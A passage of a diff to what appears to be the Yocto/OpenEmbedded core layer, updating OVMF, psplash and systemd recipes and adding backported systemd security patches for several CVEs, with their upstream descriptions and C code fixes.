29-DEFINE GCC48_X64_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address 29-DEFINE GCC48_X64_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address
@@ -32,7 +32,7 @@ index ca0b122dbb..b0066c2ab8 100755
32 DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable 32 DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable
33 DEFINE GCC48_IA32_X64_DLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive 33 DEFINE GCC48_IA32_X64_DLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive
34 DEFINE GCC48_IA32_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON) 34 DEFINE GCC48_IA32_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON)
35@@ -1953,7 +1953,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF 35@@ -1964,7 +1964,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
36 DEFINE GCC48_ASM_FLAGS = DEF(GCC_ASM_FLAGS) 36 DEFINE GCC48_ASM_FLAGS = DEF(GCC_ASM_FLAGS)
37 DEFINE GCC48_ARM_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian 37 DEFINE GCC48_ARM_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
38 DEFINE GCC48_AARCH64_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian 38 DEFINE GCC48_AARCH64_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
@@ -42,5 +42,5 @@ index ca0b122dbb..b0066c2ab8 100755
42 DEFINE GCC48_AARCH64_CC_FLAGS = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS) 42 DEFINE GCC48_AARCH64_CC_FLAGS = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS)
43 DEFINE GCC48_AARCH64_CC_XIPFLAGS = DEF(GCC_AARCH64_CC_XIPFLAGS) 43 DEFINE GCC48_AARCH64_CC_XIPFLAGS = DEF(GCC_AARCH64_CC_XIPFLAGS)
44-- 44--
452.17.1 452.28.0
46 46
diff --git a/meta/recipes-core/ovmf/ovmf_git.bb b/meta/recipes-core/ovmf/ovmf_git.bb
index 9667fa0c86..a487f77e3c 100644
--- a/meta/recipes-core/ovmf/ovmf_git.bb
+++ b/meta/recipes-core/ovmf/ovmf_git.bb
@@ -12,15 +12,19 @@ LIC_FILES_CHKSUM = "file://OvmfPkg/License.txt;md5=06357ddc23f46577c2aeaeaf7b776
12PACKAGECONFIG ??= "" 12PACKAGECONFIG ??= ""
13PACKAGECONFIG[secureboot] = ",,," 13PACKAGECONFIG[secureboot] = ",,,"
14 14
15SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=git \ 15SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=https \
16 file://0001-ovmf-update-path-to-native-BaseTools.patch \ 16 file://0001-ovmf-update-path-to-native-BaseTools.patch \
17 file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \ 17 file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \
18 file://0003-ovmf-enable-long-path-file.patch \ 18 file://0003-ovmf-enable-long-path-file.patch \
19 file://0004-ovmf-Update-to-latest.patch \ 19 file://0004-ovmf-Update-to-latest.patch \
20 " 20 file://0001-Fix-VLA-parameter-warning.patch \
21 21 file://0001-Basetools-genffs-fix-gcc12-warning.patch \
22PV = "edk2-stable201911" 22 file://0001-Basetools-lzmaenc-fix-gcc12-warning.patch \
23SRCREV = "bd85bf54c268204c7a698a96f3ccd96cd77952cd" 23 file://0001-Basetools-turn-off-gcc12-warning.patch \
24 "
25
26PV = "edk2-stable202008"
27SRCREV = "06dc822d045c2bb42e497487935485302486e151"
24UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>edk2-stable.*)" 28UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>edk2-stable.*)"
25 29
26inherit deploy 30inherit deploy
@@ -37,7 +41,7 @@ EDK_TOOLS_DIR="edk2_basetools"
37BUILD_OPTIMIZATION="-pipe" 41BUILD_OPTIMIZATION="-pipe"
38 42
39# OVMF supports IA only, although it could conceivably support ARM someday. 43# OVMF supports IA only, although it could conceivably support ARM someday.
40COMPATIBLE_HOST='(i.86|x86_64).*' 44COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
41 45
42# Additional build flags for OVMF with Secure Boot. 46# Additional build flags for OVMF with Secure Boot.
43# Fedora also uses "-D SMM_REQUIRE -D EXCLUDE_SHELL_FROM_FD". 47# Fedora also uses "-D SMM_REQUIRE -D EXCLUDE_SHELL_FROM_FD".
diff --git a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
index 5ec3f6c927..5523f874db 100644
--- a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
+++ b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
@@ -4,3 +4,4 @@ PR = "r1"
4inherit packagegroup 4inherit packagegroup
5 5
6RDEPENDS_${PN} = "dropbear" 6RDEPENDS_${PN} = "dropbear"
7RRECOMMENDS_${PN} = "openssh-sftp-server"
diff --git a/meta/recipes-core/psplash/files/psplash-start.service b/meta/recipes-core/psplash/files/psplash-start.service
index 36c2bb38e0..bec9368427 100644
--- a/meta/recipes-core/psplash/files/psplash-start.service
+++ b/meta/recipes-core/psplash/files/psplash-start.service
@@ -2,6 +2,7 @@
2Description=Start psplash boot splash screen 2Description=Start psplash boot splash screen
3DefaultDependencies=no 3DefaultDependencies=no
4RequiresMountsFor=/run 4RequiresMountsFor=/run
5ConditionFileIsExecutable=/usr/bin/psplash
5 6
6[Service] 7[Service]
7Type=notify 8Type=notify
diff --git a/meta/recipes-core/psplash/files/psplash-systemd.service b/meta/recipes-core/psplash/files/psplash-systemd.service
index 082207f232..e93e3deb35 100644
--- a/meta/recipes-core/psplash/files/psplash-systemd.service
+++ b/meta/recipes-core/psplash/files/psplash-systemd.service
@@ -4,6 +4,7 @@ DefaultDependencies=no
4After=psplash-start.service 4After=psplash-start.service
5Requires=psplash-start.service 5Requires=psplash-start.service
6RequiresMountsFor=/run 6RequiresMountsFor=/run
7ConditionFileIsExecutable=/usr/bin/psplash
7 8
8[Service] 9[Service]
9ExecStart=/usr/bin/psplash-systemd 10ExecStart=/usr/bin/psplash-systemd
diff --git a/meta/recipes-core/psplash/psplash_git.bb b/meta/recipes-core/psplash/psplash_git.bb
index 22c71f099b..b2947c2114 100644
--- a/meta/recipes-core/psplash/psplash_git.bb
+++ b/meta/recipes-core/psplash/psplash_git.bb
@@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962"
10PV = "0.1+git${SRCPV}" 10PV = "0.1+git${SRCPV}"
11PR = "r15" 11PR = "r15"
12 12
13SRC_URI = "git://git.yoctoproject.org/${BPN} \ 13SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
14 file://psplash-init \ 14 file://psplash-init \
15 file://psplash-start.service \ 15 file://psplash-start.service \
16 file://psplash-systemd.service \ 16 file://psplash-systemd.service \
diff --git a/meta/recipes-core/systemd/systemd-conf/wired.network b/meta/recipes-core/systemd/systemd-conf/wired.network
index ff807ba31f..34c20fcb24 100644
--- a/meta/recipes-core/systemd/systemd-conf/wired.network
+++ b/meta/recipes-core/systemd/systemd-conf/wired.network
@@ -1,6 +1,7 @@
1[Match] 1[Match]
2Name=en* eth* 2Name=en* eth*
3KernelCommandLine=!nfsroot 3KernelCommandLine=!nfsroot
4KernelCommandLine=!ip
4 5
5[Network] 6[Network]
6DHCP=yes 7DHCP=yes
diff --git a/meta/recipes-core/systemd/systemd-conf_244.3.bb b/meta/recipes-core/systemd/systemd-conf_244.3.bb
index d9ec023bfd..9b797a91f4 100644
--- a/meta/recipes-core/systemd/systemd-conf_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-conf_244.3.bb
@@ -23,9 +23,6 @@ do_install() {
23# Based on change from YP bug 8141, OE commit 5196d7bacaef1076c361adaa2867be31759c1b52 23# Based on change from YP bug 8141, OE commit 5196d7bacaef1076c361adaa2867be31759c1b52
24do_install_append_qemuall() { 24do_install_append_qemuall() {
25 install -D -m0644 ${WORKDIR}/system.conf-qemuall ${D}${systemd_unitdir}/system.conf.d/01-${PN}.conf 25 install -D -m0644 ${WORKDIR}/system.conf-qemuall ${D}${systemd_unitdir}/system.conf.d/01-${PN}.conf
26
27 # Do not install wired.network for qemu bsps
28 rm -rf ${D}${systemd_unitdir}/network
29} 26}
30 27
31PACKAGE_ARCH = "${MACHINE_ARCH}" 28PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-core/systemd/systemd-systemctl/systemctl b/meta/recipes-core/systemd/systemd-systemctl/systemctl
index 990de1ab39..e003c860e3 100755
--- a/meta/recipes-core/systemd/systemd-systemctl/systemctl
+++ b/meta/recipes-core/systemd/systemd-systemctl/systemctl
@@ -11,6 +11,7 @@ import re
11import sys 11import sys
12 12
13from collections import namedtuple 13from collections import namedtuple
14from itertools import chain
14from pathlib import Path 15from pathlib import Path
15 16
16version = 1.0 17version = 1.0
@@ -25,12 +26,16 @@ locations = list()
25 26
26class SystemdFile(): 27class SystemdFile():
27 """Class representing a single systemd configuration file""" 28 """Class representing a single systemd configuration file"""
28 def __init__(self, root, path): 29 def __init__(self, root, path, instance_unit_name):
29 self.sections = dict() 30 self.sections = dict()
30 self._parse(root, path) 31 self._parse(root, path)
31 dirname = os.path.basename(path.name) + ".d" 32 dirname = os.path.basename(path.name) + ".d"
32 for location in locations: 33 for location in locations:
33 for path2 in sorted((root / location / "system" / dirname).glob("*.conf")): 34 files = (root / location / "system" / dirname).glob("*.conf")
35 if instance_unit_name:
36 inst_dirname = instance_unit_name + ".d"
37 files = chain(files, (root / location / "system" / inst_dirname).glob("*.conf"))
38 for path2 in sorted(files):
34 self._parse(root, path2) 39 self._parse(root, path2)
35 40
36 def _parse(self, root, path): 41 def _parse(self, root, path):
@@ -177,12 +182,14 @@ class SystemdUnit():
177 182
178 raise SystemdUnitNotFoundError(self.root, unit) 183 raise SystemdUnitNotFoundError(self.root, unit)
179 184
180 def _process_deps(self, config, service, location, prop, dirstem): 185 def _process_deps(self, config, service, location, prop, dirstem, instance):
181 systemdir = self.root / SYSCONFDIR / "systemd" / "system" 186 systemdir = self.root / SYSCONFDIR / "systemd" / "system"
182 187
183 target = ROOT / location.relative_to(self.root) 188 target = ROOT / location.relative_to(self.root)
184 try: 189 try:
185 for dependent in config.get('Install', prop): 190 for dependent in config.get('Install', prop):
191 # expand any %i to instance (ignoring escape sequence %%)
192 dependent = re.sub("([^%](%%)*)%i", "\\g<1>{}".format(instance), dependent)
186 wants = systemdir / "{}.{}".format(dependent, dirstem) / service 193 wants = systemdir / "{}.{}".format(dependent, dirstem) / service
187 add_link(wants, target) 194 add_link(wants, target)
188 195
@@ -193,8 +200,11 @@ class SystemdUnit():
193 # if we're enabling an instance, first extract the actual instance 200 # if we're enabling an instance, first extract the actual instance
194 # then figure out what the template unit is 201 # then figure out what the template unit is
195 template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit) 202 template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit)
203 instance_unit_name = None
196 if template: 204 if template:
197 instance = template.group('instance') 205 instance = template.group('instance')
206 if instance != "":
207 instance_unit_name = self.unit
198 unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1) 208 unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1)
199 else: 209 else:
200 instance = None 210 instance = None
@@ -206,7 +216,7 @@ class SystemdUnit():
206 # ignore aliases 216 # ignore aliases
207 return 217 return
208 218
209 config = SystemdFile(self.root, path) 219 config = SystemdFile(self.root, path, instance_unit_name)
210 if instance == "": 220 if instance == "":
211 try: 221 try:
212 default_instance = config.get('Install', 'DefaultInstance')[0] 222 default_instance = config.get('Install', 'DefaultInstance')[0]
@@ -219,8 +229,8 @@ class SystemdUnit():
219 else: 229 else:
220 service = self.unit 230 service = self.unit
221 231
222 self._process_deps(config, service, path, 'WantedBy', 'wants') 232 self._process_deps(config, service, path, 'WantedBy', 'wants', instance)
223 self._process_deps(config, service, path, 'RequiredBy', 'requires') 233 self._process_deps(config, service, path, 'RequiredBy', 'requires', instance)
224 234
225 try: 235 try:
226 for also in config.get('Install', 'Also'): 236 for also in config.get('Install', 'Also'):
diff --git a/meta/recipes-core/systemd/systemd.inc b/meta/recipes-core/systemd/systemd.inc
index 3165d13f03..8b5260bb0d 100644
--- a/meta/recipes-core/systemd/systemd.inc
+++ b/meta/recipes-core/systemd/systemd.inc
@@ -16,6 +16,6 @@ LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
16 16
17SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6" 17SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6"
18SRCBRANCH = "v244-stable" 18SRCBRANCH = "v244-stable"
19SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}" 19SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}"
20 20
21S = "${WORKDIR}/git" 21S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/systemd/systemd/00-create-volatile.conf b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
index 87cbe1e7d3..c4277221a2 100644
--- a/meta/recipes-core/systemd/systemd/00-create-volatile.conf
+++ b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
@@ -3,5 +3,6 @@
3# inside /var/log. 3# inside /var/log.
4 4
5 5
6d /run/lock 1777 - - -
6d /var/volatile/log - - - - 7d /var/volatile/log - - - -
7d /var/volatile/tmp 1777 - - 8d /var/volatile/tmp 1777 - -
diff --git a/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
new file mode 100644
index 0000000000..8d3801a248
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
@@ -0,0 +1,120 @@
1From 3f9d9289ee8730a81a0464539f4e1ba2d23d0ce9 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
3Date: Tue, 3 Mar 2020 23:31:25 +0000
4Subject: [PATCH] systemd-resolved: use hostname for certificate validation in
5 DoT
6
7Widely accepted certificates for IP addresses are expensive and only
8affordable for larger organizations. Therefore if the user provides
9the hostname in the DNS= option, we should use it instead of the IP
10address.
11
12(cherry picked from commit eec394f10bbfcc3d2fc8504ad8ff5be44231abd5)
13
14CVE: CVE-2018-21029
15Upstream-Status: Backport [ff26d281aec0877b43269f18c6282cd79a7f5529]
16Signed-off-by: Marek Vasut <marex@denx.de>
17---
18 man/resolved.conf.xml | 16 +++++++++++-----
19 src/resolve/resolved-dnstls-gnutls.c | 20 ++++++++++++--------
20 src/resolve/resolved-dnstls-openssl.c | 15 +++++++++++----
21 3 files changed, 34 insertions(+), 17 deletions(-)
22
23diff --git a/man/resolved.conf.xml b/man/resolved.conf.xml
24index 818000145b..37161ebcbc 100644
25--- a/man/resolved.conf.xml
26+++ b/man/resolved.conf.xml
27@@ -193,11 +193,17 @@
28 <varlistentry>
29 <term><varname>DNSOverTLS=</varname></term>
30 <listitem>
31- <para>Takes a boolean argument or <literal>opportunistic</literal>.
32- If true all connections to the server will be encrypted. Note that
33- this mode requires a DNS server that supports DNS-over-TLS and has
34- a valid certificate for it's IP. If the DNS server does not support
35- DNS-over-TLS all DNS requests will fail. When set to <literal>opportunistic</literal>
36+ <para>Takes a boolean argument or <literal>opportunistic</literal>. If
37+ true all connections to the server will be encrypted. Note that this
38+ mode requires a DNS server that supports DNS-over-TLS and has a valid
39+ certificate. If the hostname was specified in <varname>DNS=</varname>
40+ by using the format format <literal>address#server_name</literal> it
41+ is used to validate its certificate and also to enable Server Name
42+ Indication (SNI) when opening a TLS connection. Otherwise
43+ the certificate is checked against the server's IP.
44+ If the DNS server does not support DNS-over-TLS all DNS requests will fail.</para>
45+
46+ <para>When set to <literal>opportunistic</literal>
47 DNS request are attempted to send encrypted with DNS-over-TLS.
48 If the DNS server does not support TLS, DNS-over-TLS is disabled.
49 Note that this mode makes DNS-over-TLS vulnerable to "downgrade"
50diff --git a/src/resolve/resolved-dnstls-gnutls.c b/src/resolve/resolved-dnstls-gnutls.c
51index ed0a31e8bf..c7215723a7 100644
52--- a/src/resolve/resolved-dnstls-gnutls.c
53+++ b/src/resolve/resolved-dnstls-gnutls.c
54@@ -56,15 +56,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
55 }
56
57 if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
58- stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
59- if (server->family == AF_INET) {
60- stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
61- stream->dnstls_data.validation.size = 4;
62- } else {
63- stream->dnstls_data.validation.data = server->address.in6.s6_addr;
64- stream->dnstls_data.validation.size = 16;
65+ if (server->server_name)
66+ gnutls_session_set_verify_cert(gs, server->server_name, 0);
67+ else {
68+ stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
69+ if (server->family == AF_INET) {
70+ stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
71+ stream->dnstls_data.validation.size = 4;
72+ } else {
73+ stream->dnstls_data.validation.data = server->address.in6.s6_addr;
74+ stream->dnstls_data.validation.size = 16;
75+ }
76+ gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
77 }
78- gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
79 }
80
81 gnutls_handshake_set_timeout(gs, GNUTLS_DEFAULT_HANDSHAKE_TIMEOUT);
82diff --git a/src/resolve/resolved-dnstls-openssl.c b/src/resolve/resolved-dnstls-openssl.c
83index 85e202ff74..007aedaa5b 100644
84--- a/src/resolve/resolved-dnstls-openssl.c
85+++ b/src/resolve/resolved-dnstls-openssl.c
86@@ -6,6 +6,7 @@
87
88 #include <openssl/bio.h>
89 #include <openssl/err.h>
90+#include <openssl/x509v3.h>
91
92 #include "io-util.h"
93 #include "resolved-dns-stream.h"
94@@ -78,13 +79,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
95
96 if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
97 X509_VERIFY_PARAM *v;
98- const unsigned char *ip;
99
100 SSL_set_verify(s, SSL_VERIFY_PEER, NULL);
101 v = SSL_get0_param(s);
102- ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
103- if (!X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)))
104- return -ECONNREFUSED;
105+ if (server->server_name) {
106+ X509_VERIFY_PARAM_set_hostflags(v, X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS);
107+ if (X509_VERIFY_PARAM_set1_host(v, server->server_name, 0) == 0)
108+ return -ECONNREFUSED;
109+ } else {
110+ const unsigned char *ip;
111+ ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
112+ if (X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)) == 0)
113+ return -ECONNREFUSED;
114+ }
115 }
116
117 ERR_clear_error();
118--
1192.40.1
120
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
new file mode 100644
index 0000000000..6b499efbd8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
@@ -0,0 +1,42 @@
1From 38e980a6a5a3442c2f48b1f827284388096d8ca5 Mon Sep 17 00:00:00 2001
2From: Yu Watanabe <watanabe.yu+github@gmail.com>
3Date: Thu, 24 Jun 2021 01:22:07 +0900
4Subject: [PATCH] sd-dhcp-client: tentatively ignore FORCERENEW command
5
6This makes DHCP client ignore FORCERENEW requests, as unauthenticated
7FORCERENEW requests causes a security issue (TALOS-2020-1142, CVE-2020-13529).
8
9Let's re-enable this after RFC3118 (Authentication for DHCP Messages)
10and/or RFC6704 (Forcerenew Nonce Authentication) are implemented.
11
12Fixes #16774.
13
14Upstream-Status: Backport [https://github.com/systemd/systemd/commit/38e980a6a5a3442c2f48b1f827284388096d8ca5]
15CVE: CVE-2020-13529
16
17Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
18
19---
20 src/libsystemd-network/sd-dhcp-client.c | 8 ++++++++
21 1 file changed, 8 insertions(+)
22
23--- a/src/libsystemd-network/sd-dhcp-client.c
24+++ b/src/libsystemd-network/sd-dhcp-client.c
25@@ -1392,9 +1392,17 @@ static int client_handle_forcerenew(sd_dhcp_client *client, DHCPMessage *force,
26 if (r != DHCP_FORCERENEW)
27 return -ENOMSG;
28
29+#if 0
30 log_dhcp_client(client, "FORCERENEW");
31
32 return 0;
33+#else
34+ /* FIXME: Ignore FORCERENEW requests until we implement RFC3118 (Authentication for DHCP
35+ * Messages) and/or RFC6704 (Forcerenew Nonce Authentication), as unauthenticated FORCERENEW
36+ * requests causes a security issue (TALOS-2020-1142, CVE-2020-13529). */
37+ log_dhcp_client(client, "Received FORCERENEW, ignoring.");
38+ return -ENOMSG;
39+#endif
40 }
41
42 static bool lease_equal(const sd_dhcp_lease *a, const sd_dhcp_lease *b) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
new file mode 100644
index 0000000000..e92d721d3d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
@@ -0,0 +1,67 @@
1Backport of:
2
3From 441e0115646d54f080e5c3bb0ba477c892861ab9 Mon Sep 17 00:00:00 2001
4From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
5Date: Wed, 23 Jun 2021 11:46:41 +0200
6Subject: [PATCH 1/2] basic/unit-name: do not use strdupa() on a path
7
8The path may have unbounded length, for example through a fuse mount.
9
10CVE-2021-33910: attacked controlled alloca() leads to crash in systemd and
11ultimately a kernel panic. Systemd parses the content of /proc/self/mountinfo
12and each mountpoint is passed to mount_setup_unit(), which calls
13unit_name_path_escape() underneath. A local attacker who is able to mount a
14filesystem with a very long path can crash systemd and the whole system.
15
16https://bugzilla.redhat.com/show_bug.cgi?id=1970887
17
18The resulting string length is bounded by UNIT_NAME_MAX, which is 256. But we
19can't easily check the length after simplification before doing the
20simplification, which in turns uses a copy of the string we can write to.
21So we can't reject paths that are too long before doing the duplication.
22Hence the most obvious solution is to switch back to strdup(), as before
237410616cd9dbbec97cf98d75324da5cda2b2f7a2.
24
25Upstream-Status: Backport [https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9]
26CVE: CVE-2021-33910
27
28Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
29
30---
31 src/basic/unit-name.c | 13 +++++--------
32 1 file changed, 5 insertions(+), 8 deletions(-)
33
34--- a/src/basic/unit-name.c
35+++ b/src/basic/unit-name.c
36@@ -369,12 +369,13 @@ int unit_name_unescape(const char *f, char **ret) {
37 }
38
39 int unit_name_path_escape(const char *f, char **ret) {
40- char *p, *s;
41+ _cleanup_free_ char *p = NULL;
42+ char *s;
43
44 assert(f);
45 assert(ret);
46
47- p = strdupa(f);
48+ p = strdup(f);
49 if (!p)
50 return -ENOMEM;
51
52@@ -386,13 +387,9 @@ int unit_name_path_escape(const char *f, char **ret) {
53 if (!path_is_normalized(p))
54 return -EINVAL;
55
56- /* Truncate trailing slashes */
57+ /* Truncate trailing slashes and skip leading slashes */
58 delete_trailing_chars(p, "/");
59-
60- /* Truncate leading slashes */
61- p = skip_leading_chars(p, "/");
62-
63- s = unit_name_escape(p);
64+ s = unit_name_escape(skip_leading_chars(p, "/"));
65 }
66 if (!s)
67 return -ENOMEM;
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
new file mode 100644
index 0000000000..341976822b
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
@@ -0,0 +1,65 @@
1Backport of the following upstream commit:
2From fbb77e1e55866633c9f064e2b3bcf2b6402d962d Mon Sep 17 00:00:00 2001
3From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
4Date: Tue, 23 Nov 2021 15:55:45 +0100
5Subject: [PATCH 1/3] shared/rm_rf: refactor rm_rf_children_inner() to shorten
6 code a bit
7
8CVE: CVE-2021-3997
9Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
10Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
11---
12 src/basic/rm-rf.c | 27 +++++++++------------------
13 1 file changed, 9 insertions(+), 18 deletions(-)
14
15--- a/src/basic/rm-rf.c
16+++ b/src/basic/rm-rf.c
17@@ -34,7 +34,7 @@
18 const struct stat *root_dev) {
19
20 struct stat st;
21- int r;
22+ int r, q = 0;
23
24 assert(fd >= 0);
25 assert(fname);
26@@ -50,7 +50,6 @@
27
28 if (is_dir) {
29 _cleanup_close_ int subdir_fd = -1;
30- int q;
31
32 /* if root_dev is set, remove subdirectories only if device is same */
33 if (root_dev && st.st_dev != root_dev->st_dev)
34@@ -86,23 +85,15 @@
35 * again for each directory */
36 q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
37
38- r = unlinkat(fd, fname, AT_REMOVEDIR);
39- if (r < 0)
40- return r;
41- if (q < 0)
42- return q;
43-
44- return 1;
45-
46- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
47- r = unlinkat(fd, fname, 0);
48- if (r < 0)
49- return r;
50-
51- return 1;
52- }
53+ } else if (flags & REMOVE_ONLY_DIRECTORIES)
54+ return 0;
55
56- return 0;
57+ r = unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0);
58+ if (r < 0)
59+ return r;
60+ if (q < 0)
61+ return q;
62+ return 1;
63 }
64
65 int rm_rf_children(
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
new file mode 100644
index 0000000000..066e10fbbc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
@@ -0,0 +1,101 @@
1Backport of the following upstream commit:
2From bd0127daaaae009ade053718f7d2f297aee4acaf Mon Sep 17 00:00:00 2001
3From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
4Date: Tue, 23 Nov 2021 16:56:42 +0100
5Subject: [PATCH 2/3] shared/rm_rf: refactor rm_rf() to shorten code a bit
6
7CVE: CVE-2021-3997
8Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
9Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
10---
11 src/basic/rm-rf.c | 53 ++++++++++++++++++++--------------------------
12 1 file changed, 23 insertions(+), 30 deletions(-)
13
14--- a/src/basic/rm-rf.c
15+++ b/src/basic/rm-rf.c
16@@ -159,7 +159,7 @@
17 }
18
19 int rm_rf(const char *path, RemoveFlags flags) {
20- int fd, r;
21+ int fd, r, q = 0;
22
23 assert(path);
24
25@@ -191,49 +191,47 @@
26 }
27
28 fd = open(path, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
29- if (fd < 0) {
30+ if (fd >= 0) {
31+ /* We have a dir */
